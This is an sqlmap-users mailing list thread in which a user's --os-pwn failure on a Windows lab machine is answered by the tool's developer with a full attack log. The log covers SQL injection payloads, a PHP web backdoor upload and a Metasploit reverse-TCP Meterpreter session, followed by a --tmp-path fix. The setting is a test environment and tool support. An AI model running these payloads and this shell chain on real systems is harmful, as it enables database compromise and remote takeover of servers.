In your case, problem is the --tmp-path. Have you manually set it to
"/tmp"? If so, it is wrongly set to a linux path while you should put it to
a remote (Windows) location (...--tmp-path=TMPPATH Remote absolute path of
temporary files directory)
Bye
On Fri, Apr 22, 2016 at 9:13 AM, Miroslav Stampar <
miroslav.stam...@gmail.com> wrote:
> $ sudo python sqlmap.py -u "
> http://192.168.146.132/test_environment/mysql/get_int.php?id=1"; --os-pwn
> [sudo] password for stamparm:
> _
> ___ ___| |_____ ___ ___ {1.0.4.21#dev}
> |_ -| . | | | .'| . |
> |___|_ |_|_|_|_|__,| _|
> |_| |_| http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 09:11:45
>
> [09:11:45] [WARNING] you did not provide the local path where Metasploit
> Framework is installed
> [09:11:45] [WARNING] sqlmap is going to look for Metasploit Framework
> installation inside the environment path(s)
> [09:11:45] [INFO] Metasploit Framework has been found installed in the
> '/usr/bin' path
> [09:11:45] [INFO] resuming back-end DBMS 'mysql'
> [09:11:45] [INFO] testing connection to the target URL
> [09:11:45] [INFO] heuristics detected web page charset 'ascii'
> [09:11:45] [WARNING] there is a DBMS error found in the HTTP response body
> which could interfere with the results of the tests
> sqlmap resumed the following injection point(s) from stored session:
> ---
> Parameter: id (GET)
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: id=1 AND 2546=2546
>
> Type: error-based
> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
> BY clause
> Payload: id=1 AND (SELECT 8079 FROM(SELECT
> COUNT(*),CONCAT(0x7178767071,(SELECT
> (ELT(8079=8079,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM
> INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
>
> Type: AND/OR time-based blind
> Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
> Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xlBU)
>
> Type: UNION query
> Title: Generic UNION query (NULL) - 3 columns
> Payload: id=1 UNION ALL SELECT
> NULL,NULL,CONCAT(0x7178767071,0x4d456579576479484f6370774b764245666350774a6f544b5a714c6442686644794976654154524a,0x7178767671)--
> epjZ
> ---
> [09:11:45] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: PHP 5.3.1, Apache 2.2.14
> back-end DBMS: MySQL 5.0
> [09:11:45] [INFO] fingerprinting the back-end DBMS operating system
> [09:11:45] [INFO] the back-end DBMS operating system is Windows
> how do you want to establish the tunnel?
> [1] TCP: Metasploit Framework (default)
> [2] ICMP: icmpsh - ICMP tunneling
> >
> [09:11:46] [INFO] going to use a web backdoor to establish the tunnel
> which web application language does the web server support?
> [1] ASP
> [2] ASPX
> [3] JSP
> [4] PHP (default)
> >
> [09:11:47] [WARNING] unable to retrieve automatically the web server
> document root
> what do you want to use for writable directory?
> [1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
> [2] custom location(s)
> [3] custom directory list file
> [4] brute force search
> > 1
> [09:12:02] [WARNING] unable to automatically parse any web server path
> [09:12:02] [INFO] trying to upload the file stager on '/xampp/htdocs/' via
> LIMIT 'LINES TERMINATED BY' method
> [09:12:02] [INFO] the file stager has been successfully uploaded on
> '/xampp/htdocs/' - http://192.168.146.132:80/tmpuycdj.php
> [09:12:02] [INFO] the backdoor has been successfully uploaded on
> '/xampp/htdocs/' - http://192.168.146.132:80/tmpbqtzu.php
> [09:12:02] [INFO] creating Metasploit Framework multi-stage shellcode
> which connection type do you want to use?
> [1] Reverse TCP: Connect back from the database host to this machine
> (default)
> [2] Reverse TCP: Try to connect back from the database host to this
> machine, on all ports between the specified and 65535
> [3] Reverse HTTP: Connect back from the database host to this machine
> tunnelling traffic over HTTP
> [4] Reverse HTTPS: Connect back from the database host to this machine
> tunnelling traffic over HTTPS
> [5] Bind TCP: Listen on the database host for a connection
> >
> what is the local address? [Enter for '192.168.146.1' (detected)]
> which local port number do you want to use? [59643]
> which payload do you want to use?
> [1] Meterpreter (default)
> [2] Shell
> [3] VNC
> >
> [09:12:04] [INFO] creation in progress ..... done
> [09:12:09] [INFO] uploading shellcodeexec to
> 'C:/Windows/Temp/tmpsehply.exe'
> [09:12:09] [INFO] shellcodeexec successfully uploaded
> [09:12:09] [INFO] running Metasploit Framework command line interface
> locally, please wait..
>
>
>
> ______________________________________________________________________________
> |
> |
> | METASPLOIT CYBER MISSILE COMMAND V4
> |
>
> |______________________________________________________________________________|
> \ / /
> \ . / /
> x
> \ / /
> \ / + /
> \ + / /
> * / /
> / . /
> X / / X
> / ###
> / # % #
> / ###
> . /
> . / . * .
> /
> *
> + *
>
> ^
> #### __ __ __ ####### __ __ __
> ####
> #### / \ / \ / \ ########### / \ / \ / \
> ####
>
> ################################################################################
>
> ################################################################################
> # WAVE 4 ######## SCORE 31337 ################################## HIGH
> FFFFFFFF #
>
> ################################################################################
>
> http://metasploit.pro
>
>
> =[ metasploit v4.11.8-dev-a030179 ]
> + -- --=[ 1527 exploits - 880 auxiliary - 259 post ]
> + -- --=[ 437 payloads - 38 encoders - 8 nops ]
> + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
>
> PAYLOAD => windows/meterpreter/reverse_tcp
> EXITFUNC => process
> LPORT => 59643
> LHOST => 192.168.146.1
> [*] Started reverse TCP handler on 192.168.146.1:59643
> [*] Starting the payload handler...
> [09:12:18] [INFO] running Metasploit Framework shellcode remotely via
> shellcodeexec, please wait..
> [09:12:23] [WARNING] turning off pre-connect mechanism because of
> connection time out(s)
> [*] Sending stage (957487 bytes) to 192.168.146.132
>
> meterpreter >
>
>
> On Fri, Apr 22, 2016 at 6:56 AM, Indra Zulkarnain <netzerosp...@gmail.com>
> wrote:
>
>> hi all,
>>
>> i just wondering, when i tried to do --os-pwn on sqlmap in my "DVWA
>> windows machine"
>>
>> i got an error
>>
>> [WARNING] unable to upload the file through the web file stager to '/tmp'
>>
>> i wonder is it only avaliable for linux OS ?
>>
>> thanks
>> Indra Z
>>
>> --
>> --from the net with zero space--
>>
>>
>> ------------------------------------------------------------------------------
>> Find and fix application performance issues faster with Applications
>> Manager
>> Applications Manager provides deep performance insights into multiple
>> tiers of
>> your business applications. It resolves application problems quickly and
>> reduces your MTTR. Get your free trial!
>> https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Find and fix application performance issues faster with Applications Manager
Applications Manager provides deep performance insights into multiple tiers of
your business applications. It resolves application problems quickly and
reduces your MTTR. Get your free trial!
https://ad.doubleclick.net/ddm/clk/302982198;130105516;z
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
